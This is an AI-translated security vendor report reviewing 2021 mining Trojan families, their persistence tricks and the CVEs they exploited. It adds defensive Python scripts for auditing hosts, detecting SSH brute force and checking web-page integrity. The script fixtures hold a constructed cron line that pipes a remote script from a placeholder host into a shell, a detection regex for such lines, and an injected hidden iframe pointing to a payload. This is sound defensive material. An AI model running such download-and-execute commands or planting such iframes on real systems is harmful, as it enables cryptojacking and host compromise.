A Review of Typical Mining Trojans in 2021

The original report is in Chinese, and this version is an AI-translated edition.

1. Overview

Mining Trojans use various means to implant mining programs on victims’ computers and, without the user’s knowledge, exploit the victim’s computing power to mine cryptocurrency for illegal profit. Currently, multiple threat groups (such as TeamTNT and H2Miner) are spreading mining Trojans, maliciously occupying and consuming system resources and shortening hardware lifespan, which severely affects users’ productivity and daily life and hinders social development. In 2021, Antiy CERT published several analytical reports on mining Trojans. We have now compiled the typical mining Trojans of 2021 into a family overview for sharing.

Mining Trojan Family | Appearance Time | Targeted Platform
---------------------|-----------------|------------------
Outlaw               | November 2018   | Linux
Tor2Mine             | December 2018   | Windows
TeamTNT              | October 2019    | Windows, Linux
H2Miner              | December 2019   | Windows, Linux
Satan DDoS           | May 2020        | Windows, Linux
Sysrv-hello          | December 2020   | Windows, Linux
Cloud Shovel         | February 2021   | Linux
HolesWarm            | June 2021       | Windows, Linux

2. The Dangers of Mining Trojans

  1. Consumption of a large amount of computer resources: Mining Trojans generally consume a large amount of system resources, causing the system, its services and application software to run slowly; they may even cause normal services to crash and result in data loss.
  2. Reduced computer performance and lifespan: Computers infected with mining Trojans generally have a shorter lifespan and severely degraded performance.
  3. Wasted energy and increased carbon emissions: Mining Trojans consume a large amount of electricity, resulting in huge energy consumption. At present, the main source of electricity is coal, so this exacerbates carbon emissions and pollution.
  4. Backdoors and botnets: Mining Trojans often add SSH public keys for password-free login, install RPC backdoors, receive commands from remote IRC servers, and install rootkit backdoors.
  5. Springboard for attacking other targets: Mining Trojans can control the victim’s server to launch DDoS attacks, use the server as a springboard to attack other computers, or release ransomware to demand a ransom.

3. Characteristics of the Mining Trojan Families

  • Mining currency: In 2021, most mining groups preferred to mine Monero, mainly for the following reasons. First, Monero is an untraceable and strongly anonymous currency. Second, Monero’s mining algorithm is efficient on ordinary CPUs, and the “zombies” controlled by botnets are generally not high-performance machines and lack high-performance graphics cards, so mining Monero yields more income and has become the attackers’ first choice. Finally, against the background of increasing difficulty in mining Bitcoin, Monero’s price in the virtual currency market has remained stable; compared with Bitcoin, Monero is therefore more valuable to mine, and the corresponding mining income is also more stable.
  • Competitiveness: By detecting and terminating the processes of competing mining Trojans, the Trojan monopolizes the computing resources of the target host.
  • Persistence: Long-term persistence on the target system is achieved by adding scheduled tasks, creating services, configuring automatic startup, installing rootkits, etc.
  • Concealment and evasion: Through process hiding, replacement of system commands, mutually guarding (“interlocked”) processes and other methods, the Trojan resists detection and removal.
  • Targeting: These attacks evade security checks by adding code to their scripts that terminates and uninstalls the security detection programs running on cloud service providers’ hosts. In addition, some mining Trojans, such as Cloud Shovel and H2Miner, use scanning tools to probe the IP address ranges of one or more cloud service providers.
  • Integration: Besides the core mining module, mining Trojans integrate components such as port scanning, vulnerability exploitation and backdoors to spread laterally and widely and to build botnets; TeamTNT and Outlaw are examples.
  • Cross-platform: By exploiting web component vulnerabilities, combined with malicious PowerShell, Shell and other scripts as well as malicious programs written in Python and Go, mining Trojans can run across platforms; Sysrv-hello and Satan DDoS are examples.
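The persistence and concealment techniques listed above (download-and-execute cron jobs, planted SSH keys from section 2, ld.so.preload process hiding and replaced system commands) each leave a host-side trace a defender can audit. The following Python script is an added example written for this page, not Antiy’s code or any family’s own indicators: every sample input (the crontab, the authorized_keys file, the preload entry and the digests) is constructed, the host name `example.invalid` is a placeholder, and the checks are generic heuristics rather than signatures for a specific family.

```python
import re
from typing import Dict, List, Set

# Heuristics for the persistence and backdoor techniques the report lists: cron jobs that
# download and run a script, attacker SSH keys added to authorized_keys, process hiding via
# /etc/ld.so.preload, and replaced system commands. Every sample input below is constructed.

DOWNLOAD_AND_EXEC = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")


def audit_crontab(crontab_text: str) -> List[str]:
    """Flag cron entries that fetch something remote and pipe it straight into a shell."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if DOWNLOAD_AND_EXEC.search(line):
            findings.append(f"cron download-and-execute job: {line}")
    return findings


def audit_authorized_keys(keys_text: str, allowed_key_blobs: Set[str]) -> List[str]:
    """Flag any key in authorized_keys whose base64 blob is not in the approved set."""
    findings = []
    for line in keys_text.splitlines():
        parts = line.split()
        # Line format: [options] key-type base64-blob [comment]; locate the key-type field.
        idx = next((i for i, p in enumerate(parts)
                    if p.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(parts):
            continue
        blob = parts[idx + 1]
        if blob not in allowed_key_blobs:
            comment = " ".join(parts[idx + 2:]) or "(no comment)"
            findings.append(f"unapproved SSH key in authorized_keys: {comment}")
    return findings


def audit_ld_preload(preload_text: str) -> List[str]:
    """Every library listed in /etc/ld.so.preload is injected into every process; on most
    servers the file is empty or absent, so each entry deserves a look."""
    entries = [ln.strip() for ln in preload_text.splitlines() if ln.strip()]
    return [f"ld.so.preload loads {e} (possible process-hiding rootkit)" for e in entries]


def audit_system_commands(observed: Dict[str, str], baseline: Dict[str, str]) -> List[str]:
    """Compare digests of commonly replaced tools (ps, top, netstat, ...) to a known-good baseline."""
    return [f"{name} digest differs from baseline (possible command replacement)"
            for name, digest in sorted(observed.items()) if baseline.get(name) != digest]


def audit_host(crontab_text: str, keys_text: str, allowed_key_blobs: Set[str],
               preload_text: str, observed: Dict[str, str], baseline: Dict[str, str]) -> List[str]:
    """Run all checks and return the combined list of findings."""
    return (audit_crontab(crontab_text)
            + audit_authorized_keys(keys_text, allowed_key_blobs)
            + audit_ld_preload(preload_text)
            + audit_system_commands(observed, baseline))


# --- constructed sample inputs (placeholders, not real indicators) ---
SAMPLE_CRONTAB = """# constructed crontab
0 2 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://example.invalid/x.sh | sh
"""
SAMPLE_AUTHORIZED_KEYS = """ssh-ed25519 AAAA-constructed-admin-blob ops@corp.example
ssh-rsa AAAA-constructed-unknown-blob unknown
"""
ALLOWED_KEY_BLOBS = {"AAAA-constructed-admin-blob"}
SAMPLE_LD_PRELOAD = "/usr/local/lib/libhide.so\n"
OBSERVED_DIGESTS = {"ps": "sha256:1111", "netstat": "sha256:2222"}
BASELINE_DIGESTS = {"ps": "sha256:1111", "netstat": "sha256:3333"}

if __name__ == "__main__":
    for finding in audit_host(SAMPLE_CRONTAB, SAMPLE_AUTHORIZED_KEYS, ALLOWED_KEY_BLOBS,
                              SAMPLE_LD_PRELOAD, OBSERVED_DIGESTS, BASELINE_DIGESTS):
        print(finding)
```

On a real host the inputs come from `crontab -l` for every user plus `/etc/cron.d`, from each account’s `~/.ssh/authorized_keys`, from `/etc/ld.so.preload`, and from the package manager’s or a golden image’s digests for the command baseline; the allowlist of key blobs should come from configuration management, not from the host being audited, since a compromised host cannot vouch for itself.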

4. Introduction to Typical Mining Trojan Families

4.1 Outlaw

The Outlaw botnet was first discovered in November 2018. At the time, it was a group that exploited vulnerabilities to compromise IoT devices and Linux servers and implanted malicious programs to form a botnet. They primarily engaged in Distributed Denial of Service (DDoS) attacks and provided DDoS-for-hire services on the dark web. Later, driven by the appreciation of virtual currencies, they began to embed mining trojans within botnet nodes. They then used the botnet to infiltrate and expand externally, acquiring vastly more computing resources and ultimately obtaining more virtual currency through mining.

4.1.1 Family Overview

Mining Trojan Family:    Outlaw
Appearance Time:         November 2018
Targeted Platform:       Linux
Mode of Transmission:    Vulnerability exploitation, SSH brute force cracking
Exploited Vulnerability: Shellshock, Drupalgeddon2
Mining Currency:         Monero (XMR)

4.1.2 Typical Cases

  • Outlaw raids cloud servers in the early morning

On July 28, 2021, the Outlaw botnet attacked a large number of cloud hosts and implanted botnet programs. The infected hosts contained a large number of SSH brute force cracking records, had mining programs implanted, and had attacker SSH public keys written to them.
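The Outlaw case above leaves exactly the evidence an auth log records: a burst of failed SSH logins from one source followed, if the brute force succeeds, by an accepted login from the same address. The script below is an added example for this page (not Antiy’s detection logic): it parses constructed syslog-style sshd lines, using documentation-range IP addresses that are not real indicators, and raises one alert per source address that exceeds a failure threshold inside a time window, noting whether that address later achieved a login.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Standard OpenSSH log formats for failed and accepted authentications.
FAILED = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+")
ACCEPTED = re.compile(
    r"Accepted (?P<method>password|publickey) for (?P<user>\S+) from (?P<ip>[\d.]+) port \d+")

Event = Tuple[datetime, str, str, str]  # (timestamp, kind, user, source ip)


def parse_auth_log(lines: List[str], year: int = 2021) -> List[Event]:
    """Extract failed and accepted sshd logins from syslog-style auth.log lines.
    Syslog timestamps carry no year, so the caller supplies it."""
    events: List[Event] = []
    for line in lines:
        ts = datetime.strptime(f"{year} {line[:15]}", "%Y %b %d %H:%M:%S")
        m = FAILED.search(line)
        if m:
            events.append((ts, "failed", m["user"], m["ip"]))
            continue
        m = ACCEPTED.search(line)
        if m:
            events.append((ts, "accepted-" + m["method"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events: List[Event], threshold: int = 10,
                      window_seconds: int = 600) -> Dict[str, dict]:
    """Return one alert per source IP that produced at least `threshold` failures inside any
    `window_seconds` span, recording whether that IP later obtained a session."""
    by_ip: Dict[str, List[Tuple[datetime, str, str]]] = defaultdict(list)
    for ts, kind, user, ip in events:
        by_ip[ip].append((ts, kind, user))
    alerts: Dict[str, dict] = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [ts for ts, kind, _ in evs if kind == "failed"]
        # Sliding window over the sorted failure timestamps.
        burst = any((fails[i + threshold - 1] - fails[i]).total_seconds() <= window_seconds
                    for i in range(len(fails) - threshold + 1))
        if not burst:
            continue
        success = next(((ts, kind, user) for ts, kind, user in evs
                        if kind.startswith("accepted")), None)
        alerts[ip] = {
            "failures": len(fails),
            "successful_login": success is not None,
            "user": success[2] if success else None,
        }
    return alerts


# --- constructed auth.log excerpt (documentation-range IPs, not real indicators) ---
SAMPLE_AUTH_LOG = [
    f"Jul 28 03:1{i // 10}:{(i % 10) * 5:02d} web1 sshd[2101]: Failed password for invalid user admin "
    f"from 203.0.113.7 port {40000 + i} ssh2"
    for i in range(12)  # twelve failures within about a minute
] + [
    "Jul 28 03:12:00 web1 sshd[2140]: Accepted password for root from 203.0.113.7 port 40012 ssh2",
    "Jul 28 03:20:11 web1 sshd[2201]: Failed password for root from 198.51.100.4 port 50001 ssh2",
    "Jul 28 03:21:40 web1 sshd[2202]: Failed password for root from 198.51.100.4 port 50002 ssh2",
    "Jul 28 04:00:03 web1 sshd[2300]: Accepted publickey for ops from 192.0.2.10 port 51000 ssh2",
]

if __name__ == "__main__":
    for ip, alert in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(ip, alert)
```

An alert whose `successful_login` is true is the one to treat as an incident rather than noise: it is the point at which, in the Outlaw case, the mining program and the attacker’s SSH key were planted, so the authorized_keys files and scheduled tasks of the account named in `user` should be reviewed immediately.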

4.2 Tor2Mine

The Tor2Mine mining group has been active since 2018 and is known for its expertise in cryptocurrency mining and malware delivery. The group has deployed other malware as well, including the information stealer AZORult, the remote access tool Remcos, the DarkVNC backdoor, and a clipboard-stealing Trojan that replaces cryptocurrency wallet addresses to steal more money. The name Tor2Mine comes from the fact that some variants use a Tor gateway to communicate with the mining C2 server. In 2021, Tor2Mine became very active, using PowerShell scripts to attempt to disable security software, execute mining programs, and run Mimikatz remotely to obtain Windows credentials and gain administrative privileges. With these stolen credentials, Tor2Mine can spread actively, and if it is not completely removed or the hosts are not protected by security software, it will continue to harm other systems on the infected network.

4.2.1 Family Overview

Mining Trojan Family:    Tor2Mine
Appearance Time:         December 2018
Targeted Platform:       Windows
Mode of Transmission:    Exploits
Exploited Vulnerability: Unknown
Mining Currency:         Monero (XMR)

4.2.2 Typical Activities

  • Researchers discover the Tor2Mine mining group spreading with a new variant

In December 2021, researchers discovered that Tor2Mine began spreading using a new variant that uses PowerShell scripts to attempt to disable security software, execute mining programs, and obtain Windows credentials. Using these stolen credentials, Tor2Mine can actively spread and, if not fully cleaned or protected by security software, will continue to harm other systems on the infected network.

4.3 TeamTNT

TeamTNT is a cyber threat group that targets cloud servers and containerized environments. First appearing in October 2019, the group infiltrates target systems and implants mining Trojans and botnet programs, exploiting their resources for mining and building botnets. Over the past few years, the group has grown to control a vast botnet, using frequently updated attack components. It has attracted sustained attention and tracking from cybersecurity defenders, and its attack activities have been publicly disclosed multiple times.

4.3.1 Family Overview

Mining Trojan Family:    TeamTNT
Appearance Time:         October 2019
Targeted Platform:       Windows, Linux
Mode of Transmission:    Vulnerability exploitation, credential theft
Exploited Vulnerability: Docker Remote API unauthorized access vulnerability
Mining Currency:         Monero (XMR)

4.3.2 Typical Cases

  • TeamTNT launched an attack on the Kubernetes platform; nearly 5,000 IPs were attacked

TeamTNT exploited exposed APIs on the Kubernetes platform to write and execute malicious scripts, install a Monero mining program, deploy the network scanning tool Masscan and the banner-grabbing tool Zgrab, and subsequently download and install an IRC bot. Researchers found that this attack took place between March and May 2021 and targeted 50,000 IP addresses, with IP addresses in China and the United States having the highest hit rate.

4.4 H2Miner

The H2Miner mining trojan first appeared in December 2019. Initially and for a period thereafter, it targeted Linux platforms. However, after November 2020, it began exploiting WebLogic vulnerabilities to target Windows platforms and implant mining programs. Furthermore, this mining trojan frequently exploited other common web component vulnerabilities to invade related servers and implant mining programs. For example, in December 2021, attackers exploited a Log4j vulnerability to deploy the H2Miner mining trojan.

4.4.1 Family Overview

Mining Trojan Family:    H2Miner
Appearance Time:         December 2019
Targeted Platform:       Windows, Linux
Mode of Transmission:    Exploits
Exploited Vulnerability: SaltStack remote code execution (CVE-2020-11651);
                         ThinkPHP5 RCE;
                         Apache Solr DataImportHandler RCE (CVE-2019-0193);
                         Redis unauthorized access RCE;
                         Confluence unauthorized RCE (CVE-2019-3396);
                         WebLogic RCE (CVE-2020-14882/14883);
                         Log4j vulnerability (CVE-2021-44228)
Mining Currency:         Monero (XMR)

4.4.2 Typical Cases

  • During the 2021 Spring Festival, the H2Miner mining gang used multiple vulnerabilities to attack cloud hosts

During the 2021 Spring Festival, the H2Miner mining gang took advantage of the relatively weak security operations over the holiday, used multiple vulnerability exploits to attack cloud hosts in China, and used the compromised hosts for mining. This consumed a large amount of the victim hosts’ CPU resources and seriously affected the normal operation of the services on those hosts.

4.5  Satan DDoS

Satan DDoS is a botnet capable of launching DDoS attacks and delivering cryptocurrency mining programs. The malware’s authors call it “Satan DDoS”. To distinguish it from the Satan ransomware, Unit 42 researchers refer to it as “Lucifer”. This botnet first appeared on May 29, 2020. Initially, it exploited the CVE-2019-9081 vulnerability to compromise servers running Laravel Framework version 5.7.x. It then implanted cryptocurrency mining and botnet programs, establishing a massive botnet capable of conducting mining and external DDoS attacks. Later, the botnet exploited multiple vulnerabilities and brute force attacks to spread the cryptocurrency mining program and expand the botnet.

4.5.1 Family Overview

Mining Trojan Family:    Satan DDoS, also known as Lucifer
Appearance Time:         May 29, 2020
Targeted Platform:       Windows, Linux
Mode of Transmission:    Exploits and brute force attacks
Exploited Vulnerability: CVE-2014-6287; CVE-2018-1000861; CVE-2017-10271;
                         ThinkPHP RCE (CVE-2018-20062); CVE-2018-7600;
                         CVE-2017-9791; CVE-2019-9081; PHPStudy backdoor RCE;
                         CVE-2017-0144; CVE-2017-0145; CVE-2017-8464
Mining Currency:         Monero (XMR)

4.5.2 Typical Activities

  • The CVE-2019-9081 vulnerability was used to spread the malware in the early stage of the outbreak

On May 29, 2020, Unit 42 researchers identified a malicious sample with both mining and DDoS attack capabilities from a large number of CVE-2019-9081 exploitation incidents. Researchers observed that the spread of this sample stopped on June 10, 2020.

  • Attacks targeting cloud hosts

In June 2021, the Satan DDoS botnet exploited the Shiro 1.2.4 deserialization vulnerability to attack cloud hosts, adding new attack capabilities against Linux servers in an attempt to spread itself, expand the botnet, and enhance its DDoS attack and large-scale mining capabilities.

4.6 Sysrv-hello

The Sysrv-hello mining Trojan was first discovered on December 3, 2020. The initial sample infected numerous servers, and the family has continued to spread through variants to date. This mining Trojan has multiple capabilities, including port scanning, Linux gateway detection, exploitation of RCE vulnerabilities in applications such as WebLogic, Tomcat and MySQL, and implanting the mining Trojan.

4.6.1 Family Overview

Mining Trojan Family:    Sysrv-hello
Appearance Time:         December 3, 2020
Targeted Platform:       Windows, Linux
Mode of Transmission:    Exploits
Exploited Vulnerability: Mongo Express RCE (CVE-2019-10758);
                         XXL-JOB unauthenticated RCE;
                         XML-RPC (CVE-2017-11610);
                         SaltStack RCE (CVE-2020-16846);
                         ThinkPHP RCE;
                         Drupal Ajax RCE (CVE-2018-7600)
Mining Currency:         Monero (XMR)

4.6.2 Typical Cases

  • Sysrv-hello adds new propagation capabilities, spreading mining programs by infecting web pages

A new Sysrv-hello variant began spreading on April 20, 2021. Analysis confirmed that the variant checks the target system for web page files or website directories to determine whether the system provides web services. If it does, the variant moves the mining Trojan into the corresponding path and modifies the web page files there, so that the mining Trojan is downloaded and executed when a user visits the page, further expanding the Trojan’s distribution range.
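The web-page modification described above changes files that a web server’s operators rarely touch, so a content baseline catches it even when the host-level indicators are hidden. The Python script below is an added example for this page (not Antiy’s or Sysrv-hello’s code): it snapshots SHA-256 digests of a web root, reports files that were modified or added relative to the baseline, and additionally scans pages for references to executable payloads. `run_demo` builds a constructed web root in a temporary directory, takes the baseline, then writes a constructed post-infection state (a placeholder file named `dl/update.exe` containing no real binary, and an injected hidden iframe) so the detection can be exercised offline.

```python
import hashlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# Heuristic: a src/href attribute whose target ends in an executable extension.
# Constructed for this example, not a signature from the report.
PAYLOAD_REF = re.compile(
    r"""(?:src|href)\s*=\s*["']?(?P<ref>[^"'\s>]+\.(?:exe|sh|bat|ps1|msi))\b""",
    re.IGNORECASE)

PAGE_SUFFIXES = {".html", ".htm", ".php", ".js"}


def _rel(path: Path, root: Path) -> str:
    return str(path.relative_to(root)).replace("\\", "/")


def snapshot(web_root: Path) -> Dict[str, str]:
    """SHA-256 of every file under the web root, keyed by relative path."""
    return {_rel(p, web_root): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(web_root.rglob("*")) if p.is_file()}


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Diff two snapshots into modified, added and removed relative paths."""
    return {
        "modified": sorted(f for f in baseline if f in current and baseline[f] != current[f]),
        "added": sorted(f for f in current if f not in baseline),
        "removed": sorted(f for f in baseline if f not in current),
    }


def scan_for_payload_refs(web_root: Path) -> List[Tuple[str, str]]:
    """(page, reference) pairs for every executable-looking link inside page files."""
    hits: List[Tuple[str, str]] = []
    for p in sorted(web_root.rglob("*")):
        if p.is_file() and p.suffix.lower() in PAGE_SUFFIXES:
            for m in PAYLOAD_REF.finditer(p.read_text(errors="replace")):
                hits.append((_rel(p, web_root), m["ref"]))
    return hits


def run_demo() -> Tuple[Dict[str, List[str]], List[Tuple[str, str]]]:
    """Build a constructed web root, baseline it, apply a constructed post-infection
    state, and return (snapshot diff, payload-reference hits)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_text("<html><body><h1>Welcome</h1></body></html>\n")
        (root / "about.html").write_text("<html><body>About us</body></html>\n")
        baseline = snapshot(root)

        # Constructed post-infection state: a dropped placeholder file (not a real binary)
        # and a hidden iframe injected into the landing page.
        (root / "dl").mkdir()
        (root / "dl" / "update.exe").write_bytes(b"constructed placeholder, not a real binary")
        (root / "index.html").write_text(
            '<html><body><h1>Welcome</h1>'
            '<iframe src="dl/update.exe" width="0" height="0"></iframe></body></html>\n')

        return compare(baseline, snapshot(root)), scan_for_payload_refs(root)


if __name__ == "__main__":
    changes, hits = run_demo()
    print("changes:", changes)
    print("payload references:", hits)
```

In production the baseline must be stored off-host (or signed) and refreshed only by the deployment pipeline, so that a Trojan that rewrites pages cannot also rewrite the reference it is compared against; the payload-reference scan is a cheap second signal for exactly the injection this variant performs and will also flag legitimate download links, which is why it reports rather than deletes.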

4.7 Cloud Shovel

In February 2021, Antiy CERT discovered a mining Trojan targeting Linux systems during network security monitoring. Analysis revealed that the Trojan had a hard-coded IP address range belonging to a cloud platform and was performing port probing and brute-force cracking against that range. Based on these attack characteristics, Antiy CERT named the mining Trojan “Cloud Shovel”.

4.7.1 Family Overview

Mining Trojan Family:    Cloud Shovel
Appearance Time:         2021
Targeted Platform:       Linux
Mode of Transmission:    Brute force
Exploited Vulnerability: None
Mining Currency:         Monero (XMR)

4.8 HolesWarm

HolesWarm is a cross-platform worm that first broke out in June 2021. Within a month, it used more than 20 vulnerabilities to compromise target systems and implant mining Trojans. The vulnerabilities used by this worm cover many components and applications that are frequently used in China, for example OA office software such as UFIDA and Zhiyuan, and components such as Tomcat, WebLogic, Shiro and Struts 2.

4.8.1 Family Overview

Mining Trojan Family:    HolesWarm
Appearance Time:         June 2021
Targeted Platform:       Windows, Linux
Mode of Transmission:    Exploits
Exploited Vulnerability: Hadoop YARN unauthorized command execution vulnerability;
                         UFIDA GRP-U8 injection and command execution vulnerability;
                         Struts 2 RCE command execution vulnerability;
                         XXL-JOB unauthorized task creation and command execution vulnerability
Mining Currency:         Monero (XMR)

4.8.2 Typical Cases

  • The King of Vulnerability Exploits Among Mining Trojans

Since early June 2021, in nearly a month, a worm has spread rapidly and implanted mining Trojans. During this period, it exploited over 20 vulnerabilities, including those in OA office software such as UFIDA and Zhiyuan, as well as components such as Tomcat, WebLogic, Struts 2 and Spring. This earned the worm the industry nickname “King of Vulnerability Exploits”, and the mining Trojan has also been named “HolesWarm”.

Appendix: About Antiy

Antiy is committed to enhancing the network security defense capabilities of its customers and effectively responding to security threats. Through more than 20 years of independent research and development, Antiy has developed technological leadership in areas such as threat detection engines, advanced threat countermeasures, and large-scale threat automation analysis.

Antiy has developed the IEP (Intelligent Endpoint Protection System) security product family for PC, server and other system environments, as well as the UWP (Unified Workload Protect) security products for cloud hosts, containers and other system environments, providing system security capabilities including endpoint antivirus, endpoint protection (EPP), endpoint detection and response (EDR), and Cloud Workload Protection Platform (CWPP). Antiy has established a closed-loop product system for threat countermeasures based on its threat intelligence and threat detection capabilities, achieving perception, retardation, blocking and presentation of advanced threats through products such as the Persistent Threat Detection System (PTD), Persistent Threat Analysis System (PTA), Attack Capture System (ACS), and TDS. For web and business security scenarios, Antiy has launched the PTF Next-generation Web Application and API Protection System (WAAP) and the SCS Code Security Detection System to help customers shift their security capabilities left in the DevOps process. At the same time, it has developed four major kinds of security services: network attack and defense logic deduction, in-depth threat hunting, security threat inspection, and regular security operations. Through the Threat Confrontation Operation Platform (XDR), multiple security products and services are integrated to effectively support the upgrade of comprehensive threat confrontation capabilities.

Antiy provides comprehensive security solutions for clients with high security requirements, including network and information authorities, military forces, ministries, confidential industries, and critical information infrastructure. Antiy has participated in the security work of major national political and social events since 2005 and has won honors such as the Outstanding Contribution Award and Advanced Security Group. Since 2015, Antiy’s products and services have provided security support for major spaceflight missions including manned spaceflight, lunar exploration, and space station docking, as well as significant missions such as the maiden flight of large aircraft, escort of main force ships, and Antarctic scientific research. We have received several thank-you letters from relevant departments.

Antiy is a core enabler of the global fundamental security supply chain. Nearly a hundred of the world’s leading security and IT enterprises have chosen Antiy as their partner of detection capability. At present, Antiy’s threat detection engine provides security detection capabilities for over 1.3 million network devices and over 3 billion smart terminal devices worldwide, which has become a “national-level” engine. As of now, Antiy has filed 1,877 patents in the field of cybersecurity and obtained 936 patents. It has been awarded the title of National Intellectual Property Advantage Enterprise and the 17th (2015) China Patent Excellence Award.

Antiy is an important enterprise node in China’s emergency response system and has provided early warning and comprehensive emergency response in major security threats and virus outbreaks such as “Code Red”, “Dvldr”, “Heartbleed”, “Bash Shellshock” and “WannaCry”. Antiy conducts continuous monitoring and in-depth analysis of dozens of advanced cyberspace threat actors (APT groups) such as “Equation”, “White Elephant”, “Lotus” and “Greenspot” and their attack operations, helping customers form effective protection based on an accurate picture of the adversary.